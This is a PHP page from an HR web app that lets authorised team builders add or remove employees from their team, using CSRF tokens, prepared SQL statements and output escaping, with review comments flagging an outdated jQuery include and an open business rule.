files >> /home/gracious/hris.graciousphils.com/backup hris employee/myteam.php
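<?php
/**
 * Team Builder page (myteam.php).
 *
 * Lets a signatory whose tbl_signatory row has Teambuilder = 1 attach
 * employees to, or detach them from, their own team by updating
 * tblemployees.Superior.
 *
 * Security-relevant behaviour of this page:
 *  - The acting superior is always taken from $_SESSION['empid']. The hidden
 *    "superior" form field is still rendered (client-side script may read it)
 *    but is never trusted on the server, so a tampered POST cannot assign
 *    employees to somebody else.
 *  - "Remove" only affects rows whose Superior is the logged-in user, so one
 *    team builder cannot detach members of another team.
 *  - State-changing POSTs must carry a per-session anti-CSRF token.
 *  - Every request-derived value is HTML-escaped before being echoed.
 *  - All SQL goes through prepared statements with bound values.
 */
session_start();
include('includes/config.php'); // presumably defines the PDO handle $dbh used below - confirm

/**
 * HTML-escape a value for element or double-quoted attribute context.
 * Flags and charset are explicit so the result does not depend on the
 * PHP version's defaults.
 */
$escape = function ($value) {
    return htmlentities((string) $value, ENT_QUOTES, 'UTF-8');
};
?>
<!doctype html>
<html lang="en">
<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="includes/assets/bootstrap.min.css">
    <?php
    // NOTE(review): jQuery 1.8.2 is a long-unsupported release and is loaded
    // from a third-party CDN without a Subresource Integrity attribute.
    // Upgrade after testing scriptteambuilder.js against a current release,
    // then self-host it or pin it with integrity/crossorigin attributes.
    ?>
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js"></script>
    <script type="text/javascript" src="scriptteambuilder.js"></script>
</head>
<body>
<?php include('includes/sidebar.php'); ?>
<?php
// Identity comes from the session only; a missing session means "not authorized".
$empid = isset($_SESSION['empid']) && is_scalar($_SESSION['empid'])
    ? (string) $_SESSION['empid']
    : '';

// ---- Authorization: is the logged-in user a team builder? -----------------
// Existence is checked with a fetch rather than rowCount(), which is not
// reliable for SELECT on every PDO driver. The form is rendered (and the POST
// handled) exactly once even if several signatory rows match.
$isTeamBuilder = false;
if ($empid !== '') {
    $stmt = $dbh->prepare('SELECT 1 FROM tbl_signatory WHERE Empid = :empid AND Teambuilder = 1');
    $stmt->bindValue(':empid', $empid, PDO::PARAM_STR);
    $stmt->execute();
    $isTeamBuilder = ($stmt->fetchColumn() !== false);
    $stmt->closeCursor();
}

$alertClass = '';
$alertHtml  = '';
$csrfToken  = '';
$team       = array();
$superiorNames = array();

if ($isTeamBuilder) {
    // ---- Anti-CSRF token, one per session for this page -------------------
    if (empty($_SESSION['teambuilder_csrf']) || !is_string($_SESSION['teambuilder_csrf'])) {
        $_SESSION['teambuilder_csrf'] = bin2hex(random_bytes(32));
    }
    $csrfToken = $_SESSION['teambuilder_csrf'];

    // ---- Handle Add / Remove ----------------------------------------------
    $isAdd    = isset($_POST['addemployee']);
    $isRemove = !$isAdd && isset($_POST['removeemployee']);

    if ($isAdd || $isRemove) {
        $postedToken = isset($_POST['csrf_token']) && is_string($_POST['csrf_token'])
            ? $_POST['csrf_token']
            : '';
        // Reject array-valued or empty input instead of binding it.
        $ser = isset($_POST['search']) && is_string($_POST['search'])
            ? $_POST['search']
            : '';

        if (!hash_equals($csrfToken, $postedToken)) {
            $alertClass = 'alert-danger';
            $alertHtml  = 'Request could not be verified. Reload the page and try again.';
        } else {
            $changed = false;
            if ($ser !== '') {
                if ($isAdd) {
                    // NOTE(review): this still lets a team builder claim an
                    // employee who already reports to someone else (or
                    // themselves). Confirm the intended business rule and
                    // restrict the WHERE clause accordingly.
                    $stmt = $dbh->prepare('UPDATE tblemployees SET Superior = :iss WHERE EmpId = :ser');
                } else {
                    // Only detach employees that currently belong to this user.
                    $stmt = $dbh->prepare(
                        'UPDATE tblemployees SET Superior = 0 WHERE EmpId = :ser AND Superior = :iss'
                    );
                }
                $stmt->bindValue(':iss', $empid, PDO::PARAM_STR);
                $stmt->bindValue(':ser', $ser, PDO::PARAM_STR);
                $stmt->execute();
                $changed = $stmt->rowCount() > 0;
            }

            if ($isAdd) {
                $alertClass = $changed ? 'alert-success' : 'alert-danger';
                $alertHtml  = $changed
                    ? '<strong>' . $escape($ser) . '</strong> is Successfully added to your <strong>TEAM</strong>.'
                    : 'Failed to add Employee';
            } else {
                $alertClass = $changed ? 'alert-success' : 'alert-warning';
                $alertHtml  = $changed
                    ? '<strong>' . $escape($ser) . '</strong> is successfully removed on your <strong>TEAM</strong>.'
                    : 'Failed to remove Employee';
            }
        }
    }

    // ---- Load the current team (after any update, so the table is fresh) --
    $stmt = $dbh->prepare('SELECT * FROM tblemployees WHERE Superior = :iss');
    $stmt->bindValue(':iss', $empid, PDO::PARAM_STR);
    $stmt->execute();
    $team = $stmt->fetchAll(PDO::FETCH_OBJ);

    // Resolve each distinct Superior value to a display name once, instead of
    // issuing one lookup per table row.
    $lookup = $dbh->prepare('SELECT * FROM tblemployees WHERE EmpId = :sups');
    foreach ($team as $member) {
        $key = (string) $member->Superior;
        if (array_key_exists($key, $superiorNames)) {
            continue;
        }
        $lookup->bindValue(':sups', $key, PDO::PARAM_STR);
        $lookup->execute();
        $superior = $lookup->fetch(PDO::FETCH_OBJ);
        $lookup->closeCursor();
        $superiorNames[$key] = $superior
            ? $superior->LastName . ', ' . $superior->FirstName . ' ' . $superior->MiddleName
            : '';
    }
}
?>
<?php if ($isTeamBuilder): ?>
<div class="container" style="padding-top: 100px;">
    <form method="POST">
        <input type="hidden" name="csrf_token" value="<?php echo $escape($csrfToken); ?>">
        <div class="col-md-12">
            <div class="card">
                <div class="card-header bg-primary mb-3">
                    <?php if ($alertHtml !== ''): ?>
                    <div class="alert alert-dismissible <?php echo $alertClass; ?>">
                        <button type="button" class="btn-close" data-bs-dismiss="alert"></button>
                        <?php echo $alertHtml; ?>
                    </div>
                    <?php endif; ?>
                    <h2>Team Builder</h2>
                </div>
                <div class="card-body">
                    <div class="row">
                        <div class="col-md-3">
                            <label for="search" style="color:red;">Search Employee Here</label>
                            <?php // Display/JS convenience only: the server ignores this field and uses the session. ?>
                            <input type="hidden" name="superior" id="superior" value="<?php echo $escape($empid); ?>">
                            <?php // The oninput filter is a UX aid, not validation; the server treats "search" as untrusted. ?>
                            <input type="text" id="search" name="search" required autocomplete="off" oninput="this.value = this.value.replace(/[^A-z \u00d1 \u00f1]/g, '').replace(/(\..*)\./g, '$1');" class="form-control text-dark" />
                            <br>
                            <br />
                            <!-- Suggestions will be displayed in below div. -->
                            <div id="display" class="text-dark"></div>
                            <button type="submit" class="btn btn-info" id="addemployee" name="addemployee">Add</button>
                            <button type="submit" class="btn btn-danger" id="removeemployee" name="removeemployee">Remove</button>
                        </div>
                        <div class="col-md-9">
                            <table class="table table-hover">
                                <thead>
                                    <tr class="table-primary">
                                        <th>#</th>
                                        <th>Bio Code</th>
                                        <th>Employee Name</th>
                                        <th>Department</th>
                                        <th>Company</th>
                                        <th>Immediate Superior</th>
                                    </tr>
                                </thead>
                                <tbody>
                                    <?php foreach ($team as $member): ?>
                                    <tr class="table-dark">
                                        <td><?php echo $escape($member->id); ?></td>
                                        <td><?php echo $escape($member->EmpId); ?></td>
                                        <td><?php echo $escape($member->LastName . "," . $member->FirstName . " " . $member->MiddleName); ?></td>
                                        <td><?php echo $escape($member->Department); ?></td>
                                        <td><?php echo $escape($member->Company); ?></td>
                                        <?php // Always emit the sixth cell so the row matches the header even when the lookup found nothing. ?>
                                        <td><?php echo $escape($superiorNames[(string) $member->Superior]); ?></td>
                                    </tr>
                                    <?php endforeach; ?>
                                </tbody>
                            </table>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </form>
</div>
<?php else: ?>
<div class="container" style="padding-top: 100px;">
    <div class="card">
        <div class="card-header bg-primary text-white">
            <center><h2>Team Builder</h2></center>
        </div>
        <div class="card-body text-white bg-dark">
            <center>
                <h4>You are not authorized to make action on this form Contact Personnel Department</h4>
            </center>
        </div>
        <div class="card-footer bg-primary">
        </div>
    </div>
</div>
<?php endif; ?>
</body>
</html>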